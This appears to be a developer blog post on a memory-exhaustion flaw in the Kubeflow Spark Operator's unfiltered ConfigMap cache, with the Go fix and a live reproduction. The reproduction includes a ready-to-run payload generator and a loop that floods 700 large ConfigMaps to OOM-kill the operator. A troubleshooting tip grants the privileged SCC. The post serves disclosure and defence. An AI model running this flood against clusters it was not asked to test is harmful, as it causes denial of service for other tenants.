Protect your Kubernetes Operator from OOMKill

June 1, 2026
Rishabh Singh, Ugo Giordano
Related topics: Kubernetes, Operators, Platform engineering, Security
Related products: Red Hat OpenShift

    If you've ever worked with Kubernetes, you've probably heard of operators, those helpful programs that watch over your cluster and manage complex applications automatically. They are highly effective. But they have a quiet vulnerability that's easy to miss during code review, and it can let any regular user crash your operator completely. While investigating the Spark Operator, we identified the same pattern in several other controller-runtime operators and worked with upstream maintainers to fix them. Let's walk through it.

    First, what's an informer cache?

    When your operator needs to know about resources in the cluster (like Pods or ConfigMaps), it doesn't query the Kubernetes API every single time. That would be slow and expensive. Instead, it sets up something called an informer.

    The informer performs a full LIST operation of every matching object at startup, then opens a persistent WATCH connection to receive changes in real time. The informer deserializes every object it finds into a full Go struct and stores it in an in-memory cache. Think of it as a live subscriber that keeps a local copy of that data.
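The LIST-then-WATCH behavior described above can be sketched in a few lines of Go. This is a simplified model rather than client-go's actual informer: the `Object`, `Event`, and `Cache` types are hypothetical names invented for illustration, and only the standard library is used.

```go
package main

import "fmt"

// Object is a hypothetical stand-in for a Kubernetes object such as a ConfigMap.
type Object struct {
	Namespace string
	Name      string
	Data      map[string]string
}

// EventType mirrors the kinds of changes a WATCH stream reports.
type EventType string

const (
	Added    EventType = "ADDED"
	Modified EventType = "MODIFIED"
	Deleted  EventType = "DELETED"
)

// Event is one change notification from the (hypothetical) watch stream.
type Event struct {
	Type   EventType
	Object Object
}

// Cache keeps a full local copy of every object it has been told about.
type Cache struct {
	items map[string]Object
}

func key(o Object) string { return o.Namespace + "/" + o.Name }

// NewCacheFromList models the initial LIST: every returned object is stored.
func NewCacheFromList(list []Object) *Cache {
	c := &Cache{items: make(map[string]Object, len(list))}
	for _, o := range list {
		c.items[key(o)] = o
	}
	return c
}

// Apply models the WATCH phase: each event updates the local copy.
func (c *Cache) Apply(e Event) {
	switch e.Type {
	case Added, Modified:
		c.items[key(e.Object)] = e.Object
	case Deleted:
		delete(c.items, key(e.Object))
	}
}

// Len reports how many objects are currently held in memory.
func (c *Cache) Len() int { return len(c.items) }

func main() {
	c := NewCacheFromList([]Object{
		{Namespace: "team-a", Name: "settings"},
		{Namespace: "team-b", Name: "settings"},
	})
	c.Apply(Event{Type: Added, Object: Object{Namespace: "team-c", Name: "big-blob"}})
	c.Apply(Event{Type: Deleted, Object: Object{Namespace: "team-a", Name: "settings"}})
	fmt.Println("objects held in memory:", c.Len())
}
```

The point of the model is that the cache never decides whether an object is interesting. Whatever the LIST and WATCH deliver ends up in memory.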

    Here's the catch: if you set up an informer without filters, it catches every single object of that type across the entire cluster, as illustrated in Figure 1.

    Figure 1: Informer cache mechanism caching all cluster resources indiscriminately when no filters are applied.

    The vulnerability: An unfiltered cache

    In the Kubeflow Spark Operator, the cache was configured like this:

    ByObject: map[client.Object]cache.ByObject{
        // Pods: cached only when they carry the operator's label.
        &corev1.Pod{}: {
            Label: labels.SelectorFromSet(labels.Set{
                "sparkoperator.k8s.io/launched-by-spark-operator": "true",
            }),
        },
        // ConfigMaps: empty config, so ALL ConfigMaps are cached, everywhere.
        &corev1.ConfigMap{}: {},
    }

    The operator protected Pods with a label filter, but ConfigMaps were left unfiltered. The empty {} configuration directs the informer to cache every object of that type.

    How an attacker exploits this

    Here's the scary part: an attacker does not need special permissions to execute this exploit. Any user with the edit ClusterRole (the standard role granted to developers and data scientists in multi-tenant clusters) can create a ConfigMap. That's all it takes to bring down your operator.

    The progression of this memory saturation and subsequent pod failure is mapped out in Figure 2.

    Figure 2: Out-of-memory termination sequence caused by memory growth from unfiltered resource deserialization.

    The math is simple: 700 ConfigMaps at 900 KB each equals approximately 630 MB of raw data (about 615 MiB). However, the informer does not store the raw serialized bytes. Instead, it deserializes each object into a typed Go struct (corev1.ConfigMap) with map headers, string headers, and pointer indirection, so the real memory footprint exceeds the raw data size. With a 512 MiB memory limit on the operator, the process is OOM-killed. The pod restarts, attempts to relist everything, crashes again, and enters CrashLoopBackOff. Your operator is now completely out of commission: a denial-of-service condition with no special tools required.
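The arithmetic can be checked with a short Go sketch. It assumes each payload is exactly 900 × 1024 bytes (the size used later in the walkthrough) and counts only raw payload bytes, so it is a lower bound that ignores all Go struct and map overhead.

```go
package main

import "fmt"

const (
	configMapCount = 700
	payloadBytes   = 900 * 1024        // 921,600 bytes per ConfigMap payload
	memoryLimit    = 512 * 1024 * 1024 // 512 MiB container memory limit
)

// rawPayloadBytes returns the total payload size before any in-memory overhead.
func rawPayloadBytes(count, size int) int { return count * size }

// toMiB converts a byte count to mebibytes.
func toMiB(b int) float64 { return float64(b) / (1024 * 1024) }

func main() {
	raw := rawPayloadBytes(configMapCount, payloadBytes)
	fmt.Printf("raw payload: %d bytes (%.1f MiB)\n", raw, toMiB(raw))
	fmt.Printf("limit:       %d bytes (%.1f MiB)\n", memoryLimit, toMiB(memoryLimit))
	fmt.Println("exceeds limit before overhead:", raw > memoryLimit)
}
```

Even this lower bound (645,120,000 bytes, roughly 615 MiB) is already above the 512 MiB limit, which is why the operator cannot survive the initial LIST.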

    The solution

    Resolving this memory exhaustion vulnerability requires a systematic engineering approach. Figure 3 outlines the four primary phases of the cache remediation process.

    Figure 3: Architectural phases of the step-by-step informer cache remediation sequence.

    Step 1: Filter the cache

    This solution uses the same pattern that the operator already applies to pods. The updated configuration instructs the informer to cache only the objects that contain a specific label.

    // Before (vulnerable) — caches EVERY ConfigMap in the cluster:
    &corev1.ConfigMap{}: {},
    // After (fixed) — only caches ConfigMaps your operator created:
    &corev1.ConfigMap{}: {
        Label: labels.SelectorFromSet(labels.Set{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        }),
    },

    By refining the cache scope, the informer selectively isolates objects in memory, as diagrammed in Figure 4.

    Figure 4: The label filter in action, where only operator-owned ConfigMaps enter memory.

    Now when an attacker floods the cluster with unlabeled ConfigMaps, the informer ignores them. These resources never enter your operator's memory footprint.
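To make the effect of the selector concrete, here is a minimal Go sketch of equality-based label matching. The `Object` type and the `matches` and `admitted` helpers are hypothetical and written only for illustration. In a real operator the selector is sent with the LIST and WATCH requests, so non-matching objects are never delivered to the operator at all.

```go
package main

import "fmt"

// Object is a hypothetical, simplified stand-in for a ConfigMap.
type Object struct {
	Name   string
	Labels map[string]string
}

// matches reports whether obj carries every key/value pair in selector.
// An empty (or nil) selector matches everything, which is the unfiltered case.
func matches(selector map[string]string, obj Object) bool {
	for k, v := range selector {
		if got, ok := obj.Labels[k]; !ok || got != v {
			return false
		}
	}
	return true
}

// admitted returns the objects that would enter the cache for a given selector.
func admitted(selector map[string]string, objs []Object) []Object {
	var out []Object
	for _, o := range objs {
		if matches(selector, o) {
			out = append(out, o)
		}
	}
	return out
}

func main() {
	const ownerLabel = "sparkoperator.k8s.io/created-by-spark-operator"
	objs := []Object{
		{Name: "prometheus-config", Labels: map[string]string{ownerLabel: "true"}},
		{Name: "oom-payload-1"},
		{Name: "oom-payload-2", Labels: map[string]string{"team": "data"}},
	}
	fmt.Println("unfiltered:", len(admitted(nil, objs)))
	fmt.Println("filtered:  ", len(admitted(map[string]string{ownerLabel: "true"}, objs)))
}
```

With no selector all three objects are admitted. With the owner label as the selector, only the operator's own ConfigMap is.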

    Step 2: Label your own ConfigMaps

    The operator creates Prometheus monitoring ConfigMaps for Spark applications. Because the cache now filters by label, those ConfigMaps also require the label; otherwise, your operator cannot detect its own objects.

    return &corev1.ConfigMap{
        ObjectMeta: metav1.ObjectMeta{
            Name:      prometheusConfigMapName,
            Namespace: app.Namespace,
            Labels: map[string]string{
                "sparkoperator.k8s.io/created-by-spark-operator": "true",
            },
        },
        Data: configMapData,
    }

    Step 3: Handle the resource upgrade path

    This scenario is where most engineers encounter issues. When you deploy the patched operator on a cluster that already has ConfigMaps from the old version, those existing objects lack the new label, so the filtered cache cannot detect them. The result is an awkward mismatch:

    • client.Get() returns NotFound (because the cache cannot detect the unlabeled object).
    • client.Create() returns AlreadyExists because the resource is already present in the API server.

    To bypass this limitation, you can apply a merge patch. A merge patch does not require a resourceVersion field like a standard update operation does, and it applies the label without overwriting other configurations on the object:

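    // errors is k8s.io/apimachinery/pkg/api/errors.
    if errors.IsAlreadyExists(createErr) {
        // The object exists on the API server but is invisible to the filtered cache.
        // base carries only the identity (name + namespace) of the existing object.
        base := &corev1.ConfigMap{
            ObjectMeta: metav1.ObjectMeta{
                Name:      configMap.Name,
                Namespace: configMap.Namespace,
            },
        }
        desired := base.DeepCopy()
        desired.Labels = map[string]string{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        }
        desired.Data = configMap.Data
        // MergeFrom(base) sends only the difference between base and desired.
        return c.Patch(ctx, desired, client.MergeFrom(base))
    }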

    This fallback mechanism handles resource reconciliation during deployment transitions without breaking state, as detailed in Figure 5.

    Figure 5: Logical execution flow for evaluating and patching unlabeled pre-existing resources during upgrades.
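The Get, Create, and Patch sequence can be simulated without a cluster. The sketch below is a toy model under stated assumptions: `Server`, `CachedGet`, and `ensure` are hypothetical names, the "cache" is modeled as a label-filtered view of the server's objects, and the patch is a simple key-by-key merge rather than a real API call.

```go
package main

import (
	"errors"
	"fmt"
)

const ownerLabel = "sparkoperator.k8s.io/created-by-spark-operator"

var (
	errNotFound      = errors.New("not found")
	errAlreadyExists = errors.New("already exists")
)

// ConfigMap is a hypothetical, simplified object.
type ConfigMap struct {
	Name   string
	Labels map[string]string
	Data   map[string]string
}

// Server models the API server: it knows about every object.
type Server struct{ objects map[string]*ConfigMap }

// Create fails with errAlreadyExists when the name is already taken.
func (s *Server) Create(cm ConfigMap) error {
	if _, ok := s.objects[cm.Name]; ok {
		return errAlreadyExists
	}
	s.objects[cm.Name] = &cm
	return nil
}

// Patch merges labels and data into the stored object and leaves other keys alone.
func (s *Server) Patch(name string, labels, data map[string]string) error {
	cm, ok := s.objects[name]
	if !ok {
		return errNotFound
	}
	if cm.Labels == nil {
		cm.Labels = map[string]string{}
	}
	if cm.Data == nil {
		cm.Data = map[string]string{}
	}
	for k, v := range labels {
		cm.Labels[k] = v
	}
	for k, v := range data {
		cm.Data[k] = v
	}
	return nil
}

// CachedGet models a read through the label-filtered cache:
// objects without the owner label are invisible.
func (s *Server) CachedGet(name string) (*ConfigMap, error) {
	cm, ok := s.objects[name]
	if !ok || cm.Labels[ownerLabel] != "true" {
		return nil, errNotFound
	}
	return cm, nil
}

// ensure walks the upgrade path and reports which branch was taken.
func ensure(s *Server, desired ConfigMap) (string, error) {
	if _, err := s.CachedGet(desired.Name); err == nil {
		return "found-in-cache", nil
	}
	err := s.Create(desired)
	if err == nil {
		return "created", nil
	}
	if errors.Is(err, errAlreadyExists) {
		return "patched", s.Patch(desired.Name, desired.Labels, desired.Data)
	}
	return "", err
}

func main() {
	// A pre-existing ConfigMap from the old operator version: no owner label.
	s := &Server{objects: map[string]*ConfigMap{
		"prometheus-config": {Name: "prometheus-config", Labels: map[string]string{"team": "data"}},
	}}
	desired := ConfigMap{
		Name:   "prometheus-config",
		Labels: map[string]string{ownerLabel: "true"},
		Data:   map[string]string{"prometheus.yaml": "rules: []"},
	}
	first, _ := ensure(s, desired)
	second, _ := ensure(s, desired)
	fmt.Println(first, second, s.objects["prometheus-config"].Labels["team"])
}
```

The first call takes the patched branch and the second finds the object through the filtered view. The unrelated `team` label survives, which is the property the merge patch is chosen for.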

    Step 4: Propagate labels during resource updates

    For ConfigMaps that are already visible in the cache, ensure the operator writes the label back during an update. This practice guards against edge cases where a label might be missing:

    cm.Data = configMap.Data
    if cm.Labels == nil {
        cm.Labels = map[string]string{}
    }
    cm.Labels["sparkoperator.k8s.io/created-by-spark-operator"] = "true"
    return c.Update(ctx, cm)
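The nil check in the snippet above matters because assigning into a nil map panics at run time in Go, and an object created without labels has a nil Labels map. A minimal standalone sketch of the same guard, using a hypothetical `withLabel` helper:

```go
package main

import "fmt"

// withLabel returns a label map that is guaranteed to contain key=value.
// It allocates a new map when labels is nil, because assigning into a
// nil map panics at run time.
func withLabel(labels map[string]string, key, value string) map[string]string {
	if labels == nil {
		labels = map[string]string{}
	}
	labels[key] = value
	return labels
}

func main() {
	var none map[string]string // nil, as on an object created without labels
	out := withLabel(none, "sparkoperator.k8s.io/created-by-spark-operator", "true")
	fmt.Println(len(out), out["sparkoperator.k8s.io/created-by-spark-operator"])
}
```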

    Proving it on a real cluster

    While unit tests are great, observing system behavior directly on a live cluster provides definitive validation. Here's the full walkthrough.

    The test consists of two phases: first, you confirm the vulnerability with the unpatched operator, and then you confirm the fix with the patched operator. The 700 flooded ConfigMaps remain in the cluster between phases, allowing you to test the operator against a realistic worst-case scenario. The sequential verification lifecycle across your environment is mapped in Figure 6.

    Figure 6: Live validation lifecycle for evaluating operator performance against multi-tenant resource flooding.

    Step 1: Log in to the cluster and verify access

    oc login <your-cluster-url> --username cluster-admin --password <password>
    oc whoami

    You need cluster-admin privileges to deploy the operator and create namespaces. If oc whoami returns your username, the authentication is successful.

    Step 2: Deploy the unpatched operator

    Deploy the stock operator image (quay.io/opendatahub/spark-operator:v2.4.0) using Kustomize manifests. This is the vulnerable version with no label filter on the ConfigMap cache.

    oc apply -k config/default/ --server-side=true
    oc get pods -n spark-operator -w

    The --server-side=true flag avoids field ownership conflicts with large custom resource definitions. Wait until the pod shows Running before proceeding.

    Step 3: Record the operator's baseline memory usage

    Before flooding the cluster, capture the operator's normal memory usage to establish a healthy baseline.

    oc adm top pod -n spark-operator
    NAME                                        CPU(cores)   MEMORY(bytes)
    spark-operator-controller-bb745cb-qj6vj     1m           36Mi

    Note the approximately 36 MiB value. That's your healthy reference point.

    Step 4: Create 10 test namespaces

    for i in $(seq 1 10); do oc create ns oom-test-$i; done

    Spreading ConfigMaps across multiple namespaces simulates a real multi-tenant cluster where different teams create their own resources.

    This loop executes the oc create ns oom-test-1 through oc create ns oom-test-10 commands.

    Step 5: Generate the text-based attack payload

    dd if=/dev/urandom bs=1024 count=900 2>/dev/null | base64 > /tmp/payload.txt
    truncate -s 921600 /tmp/payload.txt
    ls -lh /tmp/payload.txt

    What's happening here: The dd utility reads 900 KB of random bytes from the system, base64 converts the data into plain text because the data field of a ConfigMap must hold UTF-8 text, and truncate trims the file back to exactly 921,600 bytes (900 KB) because base64 encoding inflates the file size by approximately 33%.
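The 33% inflation follows from base64 emitting 4 output characters for every 3 input bytes. The Go sketch below reproduces the same encode-then-trim idea with the standard library. `buildPayload` is a hypothetical helper, and Go's encoder does not insert the line breaks that the `base64` command-line tool typically adds, so the pre-trim length here is slightly smaller than the file the shell pipeline produces.

```go
package main

import (
	"crypto/rand"
	"encoding/base64"
	"fmt"
)

const targetBytes = 900 * 1024 // 921,600 bytes

// buildPayload encodes n random bytes as base64 text and trims the result
// to at most limit bytes. It returns the untrimmed length and the payload.
func buildPayload(n, limit int) (int, string, error) {
	raw := make([]byte, n)
	if _, err := rand.Read(raw); err != nil {
		return 0, "", err
	}
	encoded := base64.StdEncoding.EncodeToString(raw)
	if limit > len(encoded) {
		limit = len(encoded)
	}
	return len(encoded), encoded[:limit], nil
}

func main() {
	encodedLen, payload, err := buildPayload(targetBytes, targetBytes)
	if err != nil {
		panic(err)
	}
	fmt.Println("base64 length before trimming:", encodedLen)
	fmt.Println("payload length after trimming: ", len(payload))
	fmt.Printf("inflation factor: %.2f\n", float64(encodedLen)/float64(targetBytes))
}
```

For 921,600 input bytes the encoded length is 1,228,800 characters, which is why the walkthrough trims the file before using it.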

    Step 6: Flood 700 ConfigMaps

    for i in $(seq 1 700); do
      ns="oom-test-$(( (i % 10) + 1 ))"
      oc create configmap "oom-payload-$i" --from-file=data=/tmp/payload.txt -n "$ns" 2>/dev/null &
      [ $((i % 5)) -eq 0 ] && wait
    done
    wait

    The modulo operation (% 10) distributes the ConfigMaps evenly across the 10 namespaces. The & operator runs each creation command in the background to increase execution speed, and the wait command every five iterations prevents the process from overwhelming the API server. Verify that the creation succeeded:

    oc get configmaps -A | grep oom-payload | wc -l
    # Expected: 700

    Step 7: Watch the operator termination

    oc get pods -n spark-operator -w

    Within 30 to 60 seconds, the terminal displays the following status changes:

    spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          5   16h
    spark-operator-controller-bb745cb-qj6vj   0/1   CrashLoopBackOff   5   16h
    spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          6   16h

    Confirm the error state by running the following command:

    oc describe pod -n spark-operator -l app.kubernetes.io/component=controller | grep -A3 "Last State"
    Last State:  Terminated
    Reason:    OOMKilled
    Exit Code: 137

    Vulnerability confirmed. The unfiltered informer tried to cache roughly 630 MB of raw ConfigMap data, which exceeded the 512 MiB memory limit and caused Kubernetes to terminate the process.
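Exit code 137 in the output above follows the common convention that a process killed by a signal is reported as 128 plus the signal number. An OOM kill is delivered as SIGKILL, which is signal 9 on Linux. A small Go sketch of the decoding, with a hypothetical helper name:

```go
package main

import "fmt"

const sigKill = 9 // SIGKILL signal number on Linux

// signalFromExitCode decodes the "128 + signal" convention used when a
// process is terminated by a signal. The boolean is false for ordinary exits.
func signalFromExitCode(code int) (int, bool) {
	if code > 128 && code < 256 {
		return code - 128, true
	}
	return 0, false
}

func main() {
	sig, killed := signalFromExitCode(137)
	fmt.Println(sig, killed, sig == sigKill)
}
```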

    Step 8: Build and deploy the patched operator image

    Clone the upstream fix branch, build your own image, and deploy it. The 700 flooded ConfigMaps are still sitting in the cluster, so the patched operator must withstand the same load.

    # Build from the upstream fix branch (kubeflow/spark-operator#2878)
    git clone https://github.com/kubeflow/spark-operator.git
    cd spark-operator && git checkout <fix-branch>
    docker buildx build --platform linux/amd64 -t <your-registry>/spark-operator-controller:oom-fix --push .

    The --platform linux/amd64 flag is required if you are building the image on Apple Silicon hardware; without it, the container image will not run on an x86 cluster. After pushing the image, update the running deployment:

    export IMAGE=<your-registry>/spark-operator-controller:oom-fix
    oc set image deployment/spark-operator-controller controller=$IMAGE -n spark-operator
    oc rollout status deployment/spark-operator-controller -n spark-operator

    Replace <your-registry> with your own container registry (for example, quay.io/your-username) and <fix-branch> with the branch name from the upstream pull request. The oc rollout status command blocks until the new pod is fully operational, indicating exactly when it is ready for testing.

    Step 9: Verify the fix holds

    oc get pods -n spark-operator
    NAME                                        READY   STATUS    RESTARTS   AGE
    spark-operator-controller-cdb487b68-sdfnn   1/1     Running   0          71s
    oc adm top pod -n spark-operator
    NAME                                        CPU(cores)   MEMORY(bytes)
    spark-operator-controller-cdb487b68-sdfnn   1m           14Mi

    Memory usage of 14 MiB is below the 36 MiB baseline recorded in Step 3, and the pod shows zero restarts. The label filter is doing its job. All 700 unlabeled ConfigMaps remain invisible to the informer cache.

    Metric                   Unpatched                          Patched
    Status                   OOMKilled → CrashLoopBackOff       Running, 0 restarts
    Memory                   Exceeded 512 MiB (exit code 137)   14 MiB, flat
    700 flooded ConfigMaps   All cached                         Ignored

    Step 10: Cleanup

    for i in $(seq 1 10); do oc delete ns oom-test-$i --wait=false; done
    oc delete -k config/default/
    rm -f /tmp/payload.txt

    The --wait=false flag kicks off namespace deletion in the background without blocking your terminal.

    Common issues and troubleshooting

    Use the following troubleshooting steps to resolve configuration and environment issues encountered during deployment.

    SCC errors on pod startup

    OpenShift's Security Context Constraints are stricter than vanilla Kubernetes. If pods fail to start due to an SCC validation error, grant the privileged SCC to the operator's service accounts:

    oc adm policy add-scc-to-user privileged -z spark-operator-controller -n spark-operator
    oc adm policy add-scc-to-user privileged -z spark-operator-webhook -n spark-operator

    Architecture mismatch (Apple Silicon)

    If you build the image on an Apple Silicon Mac and the target cluster uses an x86 architecture, the deployment returns a no image found for architecture "amd64" error. To resolve this issue, rebuild the image using the following command:

    docker buildx build --platform linux/amd64 -t $IMAGE --push .

    Image pull errors from quay.io

    New quay.io repositories are private by default. Navigate to your repository's Settings page and select Make Public before the cluster attempts to pull the image.

    Operator does not terminate with an OOMKilled error

    If the operator is scoped to specific namespaces using the --namespaces flag in the deployment, it will not watch the oom-test-* namespaces and will not cache the flooded ConfigMaps. Check the deployment arguments: An empty --namespaces= flag indicates a cluster-wide scope, which this test requires.

    Tips and best practices

    Implement the following design patterns and testing strategies to safeguard your operators from cache-based memory exhaustion.

    • Always use label selectors on informer caches. If your operator creates ConfigMaps, Services, or other common objects, add a label and filter the cache by that label.
    • Audit all entries in ByObject. Any entry with {}, which indicates an empty configuration, represents an unfiltered cluster-wide informer. Ask: Does this operator require a cache for every object of this type?
    • Use a merge patch for resource upgrade paths. When you add label filtering to an existing deployment, pre-existing objects will not contain the label. Use client.Patch with MergeFrom to add labels without requiring a resourceVersion field.
    • Test with realistic data volumes. The attack requires only approximately 700 ConfigMaps at 900 KB each, well within what a standard user can create. Test your deployments at this scale.

    Wrap up

    An unfiltered informer cache in a controller-runtime operator introduces a vulnerability to out-of-memory (OOM) terminations via ConfigMap flooding. Mitigating this risk involves the following steps:

    1. Add a label selector to the ByObject cache configuration.
    2. Label operator-created ConfigMaps.
    3. Manage the resource upgrade path using a merge patch for pre-existing objects.
    4. Propagate labels during resource updates.

    This vulnerability is not a theoretical problem. The upstream fix landed in kubeflow/spark-operator#2878. After resolving the issue in the Spark Operator, we audited other controller-runtime operators and discovered the same pattern. It is systemic across the controller-runtime ecosystem because a ByObject entry caches all objects of its type when no selector is specified. The vulnerability applies to any high-volume resource type, including ConfigMaps, Secrets, Services, and Pods. If you maintain a controller-runtime operator, audit your cache configuration to protect your cluster.

    Learn more

    Explore the following resources for more details on cache configuration, upstream fixes, and platform security:

    • Kubeflow Spark Operator: The upstream project
    • kubeflow/spark-operator#2878: The upstream fix for the ConfigMap cache vulnerability.
    • controller-runtime Cache Options: Official documentation for cache configuration.
    • Kubernetes Informers: Documentation explaining the watch and cache mechanism.
    • OpenShift Security Context Constraints: Understanding SCC on OpenShift.
